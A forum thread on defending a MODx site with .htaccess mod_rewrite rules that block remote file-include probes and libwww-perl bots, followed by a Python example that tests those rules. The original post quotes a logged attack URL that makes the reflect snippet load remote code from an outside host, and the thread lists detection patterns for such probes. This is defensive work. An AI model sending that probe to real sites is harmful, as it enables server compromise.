    From the moment I moved my site to a MODx platform, I began to observe an increase in the number of various scripts targeting it. I run my site on a self-configured and self-maintained server, which allows me to study every such script in detail.

    The overwhelming majority of requests sent by malicious scripts simply result in sending out error documents; sometimes, however, the scripts cause parse errors, which prompt me to study the source code and patch its weak spots. For the past two months, I have been highly satisfied with the server’s ability to distinguish between error requests by human users and malicious scripts.

    I have two error documents set up for my MODx site:
      404-object-not-found <- a full-fledged xhtml/css/graphics-decorated page, sent when a human misspells the URL in the address bar
      404-burp <- a document based on the "blank" template; its content is the single word "Burp!", and these five bytes are sent in response to malicious scripts (instead of, for example, 50-70 KB of full-featured xhtml/css that will certainly not be appreciated in any way by a non-human caller).

    Now for the most important part: each request should be analyzed and distinguished by the server. Almost every well-designed MODx site takes advantage of the "mod_rewrite" module, and this is a great opportunity for such an analysis.

    After activating the rewriting feature, you can include the following in the .htaccess file:
    # handle invalid requests (human part)
    ErrorDocument 403 http://sitedomain/404-object-not-found
    ErrorDocument 404 http://sitedomain/404-object-not-found
    
    # burp in response to malicious scripts
    RewriteCond %{QUERY_STRING} (base(dir)?|(classes|lib)_dir|error|inhalt|page|path)=|root_dir|request|session|http:// [NC]
    RewriteRule ^(.*)$ 404-burp? [R,L]
    

    The RewriteCond rule is the result of my observations of site access statistics and error and request logs. Malicious scripts attempt to accomplish their goals by sending weird query strings — these strings are intercepted by the server and the entire request is handled by four characters and an exclamation mark.

    We have no influence over who attempts to access our page (or what their intent is), but we can decide what the response will be. Example responses:

    Human’s mistake:
      http://setpro.net.pl/misspelled
    "Classical" sniffing of the MODx site -- request sent from within a Perl script:
      http://setpro.net.pl/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sites.google.com/site/bsdcr3w/Home/prc.gif??
      thank you for sharing!

      jan
        This is awesome! cool

        Is this server specific: " ...|classes_dir|error|inhalt|lib_dir|page|path)=|root_dir|request|session| ..." or does it work the same on modx/apache in general?
          It works with Apache/modx provided that friendly URLs are enabled (i.e. Apache’s mod_rewrite module is active) -- see the two examples that were added to the original post.
            Inspired smiley
              I use this
              # burp in response to malicious scripts
              RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*) [NC]
              RewriteRule ^(.*)$ 404-burp? [R,L]


              based on this: http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite

              When I used yours it worked too well - trying to access the file manager just returned "Burp!" laugh

                Great suggestion.

                I can’t remember where I got it, but I was able to block a lot of traffic with this:

                #first, block bad bots
                RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
                RewriteRule .* - [F,L]
                
                RewriteCond %{QUERY_STRING} snippet\.reflect\.php [NC,OR]
                RewriteCond %{QUERY_STRING} reflect_base [NC,OR]
                RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC]
                RewriteRule .* - [F,L]
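As an added example (not code from any of the posts above), here are the three RewriteCond rule sets from this thread replayed in Python over a handful of constructed requests, so you can check which rule each request trips and where the broader original pattern over-matches a legitimate parameter name, as hawproductions noticed with the file manager. The rule names and the sample requests are my own labels and constructions.

```python
import re

# Apache evaluates a RewriteCond pattern as an unanchored, case-insensitive (NC)
# search over the raw query string; re.search with re.I reproduces that.
# Rule names below are labels chosen for this example, not anything from Apache.
THREAD_RULES = {
    # original post: burp on suspicious parameter names or an embedded URL
    "setpro-burp": {
        "query": re.compile(r"(base(dir)?|(classes|lib)_dir|error|inhalt|page|path)="
                            r"|root_dir|request|session|http://", re.I),
    },
    # hawproductions: burp only when the query string carries a remote URL
    "haw-burp": {
        "query": re.compile(r"(.*)(http|https|ftp):\/\/(.*)", re.I),
    },
    # Bob Ray: 403 on the reflect snippet probe or on a libwww-perl user agent
    "bobray-403": {
        "query": re.compile(r"snippet\.reflect\.php|reflect_base", re.I),
        "agent": re.compile(r"libwww-perl", re.I),
    },
}


def matched_rules(target, user_agent=""):
    """Return the names of the rule sets a request (path+query, UA) would trigger."""
    query = target.partition("?")[2]  # %{QUERY_STRING}: everything after the first '?'
    hits = []
    for name, rule in THREAD_RULES.items():
        if rule["query"].search(query):
            hits.append(name)
        elif "agent" in rule and rule["agent"].search(user_agent):
            hits.append(name)
    return hits


# Constructed sample requests (path+query, User-Agent); not taken from any real log.
SAMPLES = [
    ("/misspelled", "Mozilla/5.0"),                                   # human typo
    ("/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://example.invalid/prc.gif??",
     "libwww-perl/5.805"),                                            # the probe shape from the original post
    ("/manager/index.php?a=31&path=/assets/images", "Mozilla/5.0"),   # legitimate-looking 'path=' parameter
    ("/index.php?id=5", "libwww-perl/6.02"),                          # only the user agent is suspicious
]

if __name__ == "__main__":
    for target, agent in SAMPLES:
        print(f"{target:60.60} {agent:18} -> {matched_rules(target, agent) or ['pass']}")
```

The third sample is the kind of request that only the original post's pattern blocks, which is the trade-off between the two "burp" rules: the broader parameter-name list catches more probes but also any legitimate page that uses `path=`, `page=` or similar names.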